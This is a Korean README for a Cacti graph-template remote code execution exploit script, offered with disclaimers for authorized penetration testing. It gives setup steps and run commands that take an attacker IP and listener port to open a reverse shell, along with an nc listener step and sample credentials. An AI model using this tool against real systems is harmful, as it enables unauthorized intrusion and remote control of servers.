
Cacti 그래프 템플릿 취약점에 대한 인증된 원격 코드 실행 익스플로잇으로, 승인된 침투 테스트를 위한 리버스 셸 페이로드와 프록시 지원을 포함합니다.
중요 — 먼저 읽으십시오:
이 저장소와exploit.py는 교육 및 연구 목적으로만 제공됩니다. 명시적인 서면 승인을 받지 않은 시스템, 네트워크, 서비스에 대해 이 코드를 사용하지 마십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다. 이 코드를 사용함으로써 귀하는 관련 법률 및 기관 정책을 준수하는 데 동의하는 것입니다.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
스크립트를 실행하기 전에 nc 리스너가 실행 중인지 확인하십시오. 디버깅이 아닌 경우 프록시 없이 스크립트를 실행하십시오:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
최종 알림: 이 스크립트와 README는 교육용으로만 사용됩니다. 이러한 도구를 불법적으로 시스템에 접근하는 데 사용하지 마십시오.